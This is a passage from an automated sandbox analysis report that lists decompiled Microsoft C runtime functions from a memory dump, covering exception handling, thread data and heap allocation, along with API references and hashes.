                                                    • API ID: Resource$FindFreeLoadLockSizeof_memmove_memset
                                                    • String ID:
                                                    • API String ID: 4079094743-0
                                                    • Opcode ID: 1d956f980d84911c39189db9744b559c9639ae4c5f3979b073daaa510dc817e7
                                                    • Instruction ID: 24469af2804e29e36c4d2d2effe386160f9a85adf712f630c3e67e56fa7fe845
                                                    • Opcode Fuzzy Hash: 1d956f980d84911c39189db9744b559c9639ae4c5f3979b073daaa510dc817e7
                                                    • Instruction Fuzzy Hash: E541B2715002189FDB26DF28CC45FEAB7F8EB49700F01495EF555DB242DB70AE448BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C784D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 66%
                                                    			E003C784D(void* __ecx, void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				void* _t16;
				intOrPtr* _t19;
				void* _t23;
				void* _t26;

				_t27 = __esi;
				_t25 = __edx;
				_t32 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
					L8:
					__eflags =  *((intOrPtr*)(E003C3F5E(_t23, _t25, _t26, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E003C3F5E(_t23, _t25, _t26, __eflags);
						_t9 = _t16 + 0x90;
						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t9;
					}
					goto L10;
				} else {
					__eflags = __eax - 0xe0434f4d;
					if(__eflags == 0) {
						goto L8;
					} else {
						__eflags = __eax - 0xe06d7363;
						if(__eflags != 0) {
							L10:
							__eflags = 0;
							return 0;
						} else {
							 *(E003C3F5E(__ebx, __edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
							_push(8);
							_push(0x3cb678);
							E003C4440(_t23, _t26, __esi);
							_t19 =  *((intOrPtr*)(E003C3F5E(_t23, __edx, _t26, _t32) + 0x78));
							if(_t19 != 0) {
								_v8 = _v8 & 0x00000000;
								 *_t19();
								_v8 = 0xfffffffe;
							}
							return E003C4485(E003C5372(_t23, _t25, _t26, _t27));
						}
					}
				}
			}









                                                    0x003c784d
                                                    0x003c784d
                                                    0x003c7859
                                                    0x003c785e
                                                    0x003c787f
                                                    0x003c7884
                                                    0x003c788b
                                                    0x003c788d
                                                    0x003c7892
                                                    0x003c7892
                                                    0x003c7892
                                                    0x003c7892
                                                    0x00000000
                                                    0x003c7860
                                                    0x003c7860
                                                    0x003c7865
                                                    0x00000000
                                                    0x003c7867
                                                    0x003c7867
                                                    0x003c786c
                                                    0x003c7898
                                                    0x003c7898
                                                    0x003c789b
                                                    0x003c786e
                                                    0x003c7873
                                                    0x003c3925
                                                    0x003c3927
                                                    0x003c392c
                                                    0x003c3936
                                                    0x003c393b
                                                    0x003c393d
                                                    0x003c3941
                                                    0x003c394c
                                                    0x003c394c
                                                    0x003c395d
                                                    0x003c395d
                                                    0x003c786c
                                                    0x003c7865

                                                    APIs
                                                    • __getptd.LIBCMT ref: 003C786E
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C787F
                                                    • __getptd.LIBCMT ref: 003C788D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                    • String ID: MOC$RCC$csm
                                                    • API String ID: 803148776-2671469338
                                                    • Opcode ID: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                    • Instruction ID: 183ddfd97119c2109039ace7b9adc1b32f8672d198ee78c8932a80a57a0a5f57
                                                    • Opcode Fuzzy Hash: 08023554eef41aad810a177e4eb83e4040c19767ddd1b36da22133d8c48aeee6
                                                    • Instruction Fuzzy Hash: 74E012355182049FC721AB6AC04FFA832A4EF94314F5685ADE90DCB222C735ED50CB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C7AFF Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E003C7AFF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x3cba68);
				E003C4440(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E003C76B7(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E003C3F5E(__ecx, _t53, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E003C3F5E(_t48, _t53, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E003C3F5E(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E003C3F5E(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E003C775C(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E003C7C25(_t48, _t53, _t55, _t57, _t61);
				return E003C4485( *((intOrPtr*)(_t58 - 0x1c)));
			}








                                                    0x003c7aff
                                                    0x003c7aff
                                                    0x003c7b01
                                                    0x003c7b06
                                                    0x003c7b0b
                                                    0x003c7b0d
                                                    0x003c7b10
                                                    0x003c7b13
                                                    0x003c7b16
                                                    0x003c7b1d
                                                    0x003c7b2e
                                                    0x003c7b3c
                                                    0x003c7b4a
                                                    0x003c7b52
                                                    0x003c7b60
                                                    0x003c7b66
                                                    0x003c7b6d
                                                    0x003c7b70
                                                    0x003c7b86
                                                    0x003c7b89
                                                    0x003c7bfe
                                                    0x003c7c05
                                                    0x003c7c0c
                                                    0x003c7c19

                                                    APIs
                                                    • __CreateFrameInfo.LIBCMT ref: 003C7B27
                                                      • Part of subcall function 003C76B7: __getptd.LIBCMT ref: 003C76C5
                                                      • Part of subcall function 003C76B7: __getptd.LIBCMT ref: 003C76D3
                                                    • __getptd.LIBCMT ref: 003C7B31
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C7B3F
                                                    • __getptd.LIBCMT ref: 003C7B4D
                                                    • __getptd.LIBCMT ref: 003C7B58
                                                    • _CallCatchBlock2.LIBCMT ref: 003C7B7E
                                                      • Part of subcall function 003C775C: __CallSettingFrame@12.LIBCMT ref: 003C77A8
                                                      • Part of subcall function 003C7C25: __getptd.LIBCMT ref: 003C7C34
                                                      • Part of subcall function 003C7C25: __getptd.LIBCMT ref: 003C7C42
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1602911419-0
                                                    • Opcode ID: 4deb7a749044087d008f738892dcad3b3dd41073223d3c26cc739cfdf4ac3836
                                                    • Instruction ID: 8cd0486c46936a11f7c6162e4d0c7dfd36f035b9fa434e239eb229f29b7c9c7c
                                                    • Opcode Fuzzy Hash: 4deb7a749044087d008f738892dcad3b3dd41073223d3c26cc739cfdf4ac3836
                                                    • Instruction Fuzzy Hash: E411B3B1C042099BDB11EFA5D846BEDBBB4AF08315F10846EF818EB251DB399A159F50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C5D96 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E003C5D96(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x3cb768);
				E003C4440(__ebx, __edi, __esi);
				_t31 = E003C3F5E(__ebx, __edx, __edi, _t35);
				_t15 =  *0x3cdb20; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E003C38F2(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x3cda18; // 0x27615f8
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x3cd5f0;
								if(__eflags != 0) {
									E003C352B(_t33);
								}
							}
						}
						_t21 =  *0x3cda18; // 0x27615f8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x3cda18; // 0x27615f8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E003C5E31();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E003C2EDA(_t29, _t31, _t33, _t38);
				}
				return E003C4485(_t33);
			}









                                                    0x003c5d96
                                                    0x003c5d96
                                                    0x003c5d96
                                                    0x003c5d96
                                                    0x003c5d98
                                                    0x003c5d9d
                                                    0x003c5da7
                                                    0x003c5da9
                                                    0x003c5db1
                                                    0x003c5dd2
                                                    0x003c5dd8
                                                    0x003c5ddc
                                                    0x003c5ddf
                                                    0x003c5de2
                                                    0x003c5de8
                                                    0x003c5dea
                                                    0x003c5dec
                                                    0x003c5df5
                                                    0x003c5df7
                                                    0x003c5df9
                                                    0x003c5dff
                                                    0x003c5e02
                                                    0x003c5e07
                                                    0x003c5dff
                                                    0x003c5df7
                                                    0x003c5e08
                                                    0x003c5e0d
                                                    0x003c5e10
                                                    0x003c5e16
                                                    0x003c5e1a
                                                    0x003c5e1a
                                                    0x003c5e20
                                                    0x003c5e27
                                                    0x003c5db9
                                                    0x003c5db9
                                                    0x003c5db9
                                                    0x003c5dbc
                                                    0x003c5dbe
                                                    0x003c5dc0
                                                    0x003c5dc2
                                                    0x003c5dc7
                                                    0x003c5dcf

                                                    APIs
                                                    • __getptd.LIBCMT ref: 003C5DA2
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __amsg_exit.LIBCMT ref: 003C5DC2
                                                    • __lock.LIBCMT ref: 003C5DD2
                                                    • InterlockedDecrement.KERNEL32(?), ref: 003C5DEF
                                                    • _free.LIBCMT ref: 003C5E02
                                                    • InterlockedIncrement.KERNEL32(027615F8), ref: 003C5E1A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 73d728f89b17b76b44e8fda70fa871640029242eb1666176339569cbb181bce7
                                                    • Instruction ID: c260f489a9bd07ea482401bdf7f334704571d8848b17c0a59c969abb387d5bf1
                                                    • Opcode Fuzzy Hash: 73d728f89b17b76b44e8fda70fa871640029242eb1666176339569cbb181bce7
                                                    • Instruction Fuzzy Hash: 86015E36D05B21ABC717AB25980AF9DB764AF44711F16401DF400EB690CB347E81CBD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C7EAC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 28%
                                                    			E003C7EAC(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E003C7E1A(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E003C7411(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E003C789C(_t22, _t23, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E003C7AFF(_t22,  *_t14, _t26, _t27, _t31);
				if(_t20 != 0) {
					E003C73D8(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                    0x003c7eac
                                                    0x003c7eac
                                                    0x003c7eac
                                                    0x003c7eac
                                                    0x003c7eb1
                                                    0x003c7eb5
                                                    0x003c7eb7
                                                    0x003c7eba
                                                    0x003c7ebb
                                                    0x003c7ebc
                                                    0x003c7ebf
                                                    0x003c7ec4
                                                    0x003c7ec4
                                                    0x003c7ec7
                                                    0x003c7ecb
                                                    0x003c7ece
                                                    0x003c7ed3
                                                    0x003c7ed0
                                                    0x003c7ed0
                                                    0x003c7ed0
                                                    0x003c7ed6
                                                    0x003c7edb
                                                    0x003c7edd
                                                    0x003c7ee0
                                                    0x003c7ee3
                                                    0x003c7ee4
                                                    0x003c7eec
                                                    0x003c7ef1
                                                    0x003c7ef5
                                                    0x003c7ef8
                                                    0x003c7efb
                                                    0x003c7efe
                                                    0x003c7f01
                                                    0x003c7f02
                                                    0x003c7f05
                                                    0x003c7f0f
                                                    0x003c7f13
                                                    0x00000000
                                                    0x003c7f13
                                                    0x003c7f19

                                                    APIs
                                                    • ___BuildCatchObject.LIBCMT ref: 003C7EBF
                                                      • Part of subcall function 003C7E1A: ___BuildCatchObjectHelper.LIBCMT ref: 003C7E50
                                                    • _UnwindNestedFrames.LIBCMT ref: 003C7ED6
                                                    • ___FrameUnwindToState.LIBCMT ref: 003C7EE4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                    • String ID: csm$csm
                                                    • API String ID: 2163707966-3733052814
                                                    • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                    • Instruction ID: f8f93a6e29eba3db1e2fe59bd335c21bf61c229118179d2bbd961ef766d8f0c1
                                                    • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                    • Instruction Fuzzy Hash: 5E01D236404209BBDF136F62CC46FAA7E6AEF18390F004458BD1899561D7729DA1EFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 52%
                                                    			E003C2EF8(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v0;
				char* _v8;
				intOrPtr _v12;
				char _v20;
				intOrPtr _v28;
				void* _t20;
				signed int _t21;
				intOrPtr _t25;
				signed int _t27;
				void* _t33;
				void* _t34;
				void* _t35;
				signed int _t36;
				void* _t40;
				intOrPtr _t41;
				void* _t43;
				char* _t46;
				void* _t54;
				void* _t55;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr* _t64;
				intOrPtr* _t65;
				void* _t68;

				_t62 = __esi;
				_t55 = __edi;
				while(1) {
					_t20 = E003C3403(_t54, _t55, _t62, _a4);
					if(_t20 != 0) {
						break;
					}
					_t21 = E003C3D86(_t20, _a4);
					__eflags = _t21;
					if(_t21 == 0) {
						__eflags =  *0x3cdcc0 & 0x00000001;
						if(( *0x3cdcc0 & 0x00000001) == 0) {
							 *0x3cdcc0 =  *0x3cdcc0 | 0x00000001;
							__eflags =  *0x3cdcc0;
							_push(1);
							_v8 = "bad allocation";
							E003C2710(0x3cdcb4,  &_v8);
							 *0x3cdcb4 = 0x3c91f4;
							E003C309B( *0x3cdcc0, 0x3c882e);
						}
						_t46 =  &_v20;
						E003C2826(_t46, 0x3cdcb4);
						_v20 = 0x3c91f4;
						E003C3252( &_v20, 0x3cb7e8);
						asm("int3");
						_t64 = __imp__DecodePointer;
						_t25 =  *_t64( *0x3cea74, 0x3cdcb4, 0x3c91f4, _t40, _t46, _t68);
						_t41 = _t25;
						_v28 = _t41;
						_t65 =  *_t64( *0x3cea70);
						__eflags = _t65 - _t41;
						if(_t65 < _t41) {
							L18:
							_t27 = 0;
							__eflags = 0;
						} else {
							_t59 = _t65 - _t41;
							_t11 = _t59 + 4; // 0x4
							__eflags = _t11 - 4;
							if(_t11 < 4) {
								goto L18;
							} else {
								_t43 = E003C491C(_t41);
								_t12 = _t59 + 4; // 0x4
								__eflags = _t43 - _t12;
								if(_t43 >= _t12) {
									L17:
									_t60 = __imp__EncodePointer;
									 *_t65 =  *_t60(_v0);
									 *0x3cea70 =  *_t60(_t65 + 4);
									_t27 = _v0;
								} else {
									_t33 = 0x800;
									__eflags = _t43 - 0x800;
									if(_t43 < 0x800) {
										_t33 = _t43;
									}
									_t34 = _t33 + _t43;
									__eflags = _t34 - _t43;
									if(_t34 < _t43) {
										L14:
										_t14 = _t43 + 0x10; // 0x10
										_t35 = _t14;
										__eflags = _t35 - _t43;
										if(_t35 < _t43) {
											goto L18;
										} else {
											_t36 = E003C48CE(_v12, _t35);
											__eflags = _t36;
											if(_t36 == 0) {
												goto L18;
											} else {
												goto L16;
											}
										}
									} else {
										_t36 = E003C48CE(_v12, _t34);
										__eflags = _t36;
										if(_t36 != 0) {
											L16:
											_t65 = _t36 + (_t59 >> 2) * 4;
											__imp__EncodePointer(_t36);
											 *0x3cea74 = _t36;
											goto L17;
										} else {
											goto L14;
										}
									}
								}
							}
						}
						return _t27;
					} else {
						continue;
					}
					L20:
				}
				return _t20;
				goto L20;
			}




























                                                    0x003c2ef8
                                                    0x003c2ef8
                                                    0x003c2f0f
                                                    0x003c2f12
                                                    0x003c2f1a
                                                    0x00000000
                                                    0x00000000
                                                    0x003c2f05
                                                    0x003c2f0b
                                                    0x003c2f0d
                                                    0x003c2f1e
                                                    0x003c2f2f
                                                    0x003c2f31
                                                    0x003c2f31
                                                    0x003c2f38
                                                    0x003c2f40
                                                    0x003c2f47
                                                    0x003c2f51
                                                    0x003c2f57
                                                    0x003c2f5c
                                                    0x003c2f5e
                                                    0x003c2f61
                                                    0x003c2f6f
                                                    0x003c2f72
                                                    0x003c2f77
                                                    0x003c2f80
                                                    0x003c2f8d
                                                    0x003c2f95
                                                    0x003c2f97
                                                    0x003c2f9c
                                                    0x003c2f9e
                                                    0x003c2fa0
                                                    0x003c3027
                                                    0x003c3027
                                                    0x003c3027
                                                    0x003c2fa6
                                                    0x003c2fa8
                                                    0x003c2faa
                                                    0x003c2fad
                                                    0x003c2fb0
                                                    0x00000000
                                                    0x003c2fb2
                                                    0x003c2fb8
                                                    0x003c2fba
                                                    0x003c2fbe
                                                    0x003c2fc0
                                                    0x003c300a
                                                    0x003c300d
                                                    0x003c3015
                                                    0x003c301d
                                                    0x003c3022
                                                    0x003c2fc2
                                                    0x003c2fc2
                                                    0x003c2fc7
                                                    0x003c2fc9
                                                    0x003c2fcb
                                                    0x003c2fcb
                                                    0x003c2fcd
                                                    0x003c2fcf
                                                    0x003c2fd1
                                                    0x003c2fe2
                                                    0x003c2fe2
                                                    0x003c2fe2
                                                    0x003c2fe5
                                                    0x003c2fe7
                                                    0x00000000
                                                    0x003c2fe9
                                                    0x003c2fed
                                                    0x003c2ff4
                                                    0x003c2ff6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x003c2ff6
                                                    0x003c2fd3
                                                    0x003c2fd7
                                                    0x003c2fde
                                                    0x003c2fe0
                                                    0x003c2ff8
                                                    0x003c2ffc
                                                    0x003c2fff
                                                    0x003c3005
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x003c2fe0
                                                    0x003c2fd1
                                                    0x003c2fc0
                                                    0x003c2fb0
                                                    0x003c302d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x003c2f0d
                                                    0x003c2f1d
                                                    0x00000000

                                                    APIs
                                                    • _malloc.LIBCMT ref: 003C2F12
                                                      • Part of subcall function 003C3403: __FF_MSGBANNER.LIBCMT ref: 003C341C
                                                      • Part of subcall function 003C3403: __NMSG_WRITE.LIBCMT ref: 003C3423
                                                      • Part of subcall function 003C3403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003C484E,00000000,00000001,00000000,?,003C387D,00000018,003CB658,0000000C,003C390D), ref: 003C3448
                                                    • std::exception::exception.LIBCMT ref: 003C2F47
                                                    • std::exception::exception.LIBCMT ref: 003C2F61
                                                    • __CxxThrowException@8.LIBCMT ref: 003C2F72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                    • String ID: bad allocation
                                                    • API String ID: 615853336-2104205924
                                                    • Opcode ID: 0f73b3260e39076b1a1bc2a31f2be2f90f08de34af6deacc6758a7d7e1b1d705
                                                    • Instruction ID: 5bf6a31da77686a4464a22ebdaed14de920310e4461e2873a37d29a1be2f1be3
                                                    • Opcode Fuzzy Hash: 0f73b3260e39076b1a1bc2a31f2be2f90f08de34af6deacc6758a7d7e1b1d705
                                                    • Instruction Fuzzy Hash: D0F0AF3590421DAACB17EB64DC4AF9E7AB9AF40714F14442DF905EA192CFB1AF01D790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C664D Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E003C664D(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x3ce8c0, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x3ce8c4 - _t7;
								if(__eflags == 0) {
									_t9 = E003C4264(__eflags);
									 *_t9 = E003C4222(GetLastError());
									goto L17;
								} else {
									__eflags = E003C3D86(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E003C4264(__eflags);
										 *_t12 = E003C4222(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E003C3D86(_t6, _t30);
						 *((intOrPtr*)(E003C4264(__eflags))) = 0xc;
						goto L12;
					} else {
						E003C352B(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E003C3403(__edx, __edi, __esi, _a8);
				}
			}









                                                    0x003c6656
                                                    0x003c6663
                                                    0x003c6664
                                                    0x003c6667
                                                    0x003c6669
                                                    0x003c6678
                                                    0x003c66ab
                                                    0x003c66ab
                                                    0x003c66ae
                                                    0x00000000
                                                    0x00000000
                                                    0x003c667b
                                                    0x003c667d
                                                    0x003c667f
                                                    0x003c667f
                                                    0x003c667f
                                                    0x003c668c
                                                    0x003c6692
                                                    0x003c6694
                                                    0x003c6696
                                                    0x003c66f6
                                                    0x003c66f6
                                                    0x003c6698
                                                    0x003c6698
                                                    0x003c669e
                                                    0x003c66e0
                                                    0x003c66f4
                                                    0x00000000
                                                    0x003c66a0
                                                    0x003c66a7
                                                    0x003c66a9
                                                    0x003c66c8
                                                    0x003c66dc
                                                    0x003c66c2
                                                    0x003c66c2
                                                    0x003c66c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x003c66a9
                                                    0x003c669e
                                                    0x00000000
                                                    0x003c66c4
                                                    0x003c66b1
                                                    0x003c66bc
                                                    0x00000000
                                                    0x003c666b
                                                    0x003c666e
                                                    0x003c6674
                                                    0x003c6674
                                                    0x003c66c5
                                                    0x003c66c7
                                                    0x003c6658
                                                    0x003c6662
                                                    0x003c6662

                                                    APIs
                                                    • _malloc.LIBCMT ref: 003C665B
                                                      • Part of subcall function 003C3403: __FF_MSGBANNER.LIBCMT ref: 003C341C
                                                      • Part of subcall function 003C3403: __NMSG_WRITE.LIBCMT ref: 003C3423
